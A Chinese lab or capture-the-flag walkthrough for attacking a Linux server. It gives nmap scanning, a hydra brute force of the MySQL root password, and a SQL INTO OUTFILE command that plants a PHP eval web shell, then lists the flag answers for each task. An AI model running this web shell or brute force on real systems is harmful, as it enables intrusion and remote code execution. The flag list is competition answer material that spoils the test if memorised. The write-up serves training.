目录
前言:
这是关于网络安全里Linux操作系统的渗透测试,主要使用的事mysql注入,欢迎大家前来学习,借鉴。
一:
1.通过Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为Flag提交;
命令:nmap –sV –O 172.16.202.250 –T5
Flag{Linux 2.6.32 - 3.10}
二:
2.通过Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为Flag提交;
命令: nmap -sV -O 172.16.202.250 -T5
Flag{MySQL 5.1.73-log}
三:
3.通过Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为Flag提交;
开放mysql端口,使用hydra去尝试爆破root账号的密码
命令:hydra -l root -p 3112ab mysql://172.16.202.250 -t 4
得到账号密码,root:3112ab
使用mysql登录,并且使用select构造一句话木马,对其进行渗透
命令:select '<?php @eval($_POST['cmd']);?>' into outfile '/var/www/html/shell.php';
使用浏览器访问,并使用中国菜刀连接
连接成功
Flag{loginmanager}
四:
4.通过Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为Flag提交;
Flag{slkrvung}
五:
5.通过Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为Flag提交;
Flag{vmifeo}
六:
6.通过Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag提交。
Flag{glamorous}